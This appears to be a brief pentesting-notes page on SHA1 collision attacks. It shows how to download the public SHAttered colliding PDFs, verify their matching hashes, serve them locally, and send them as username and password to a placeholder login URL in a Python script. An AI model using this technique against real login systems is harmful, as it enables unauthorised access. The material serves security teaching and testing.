# SHA1 Hash Collision Attack

### Sample Attacks <a href="#sample-attacks" id="sample-attacks"></a>

#### 1. Download two Files <a href="#id-1-download-two-files" id="id-1-download-two-files"></a>

There are several ways to download files. So we can select our desired files as purposes.

* Download the original two PDF files in [SHAttered](https://shattered.io/).
* Download two custom Files (e.g. messageA and messageB) in [Chosen-Prefix Collision Example](https://sha-mbles.github.io/).

Check if the SHA1 hash is the same as each other.

```shellscript
sha1sum shattered-1.pdf
sha1sum shattered-2.pdf

sha1sum messageA
sha1sum messageB
```

#### 2. Host the PDF Files Locally <a href="#id-2-host-the-pdf-files-locally" id="id-2-host-the-pdf-files-locally"></a>

In the directory where the two PDF files located, start local server for using in a Python script.

```
python3 -m http.server 8000
```

#### 3. Create a Python Script <a href="#id-3-create-a-python-script" id="id-3-create-a-python-script"></a>

For example, create a “test.py”.

```shellscript
import requests

file1 = "shattered-1.pdf"
file2 = "shattered-2.pdf"

pdf_1 = requests.get(f'http://localhost:8000/{file1}')
pdf_2 = requests.get(f'http://localhost:8000/{file2}')

# e.g. the two values can be used as username/password.
params = {'username': pdf_1.content, 'password': pdf_2.content}
r = requests.get('https://example.com/login', params=params)
print(r.text)
```

#### 4. Run the Script <a href="#id-4-run-the-script" id="id-4-run-the-script"></a>

```
python3 test.py
```

### References <a href="#references" id="references"></a>

* [Shattered](https://shattered.io/)
* [sha-mbles](https://sha-mbles.github.io/)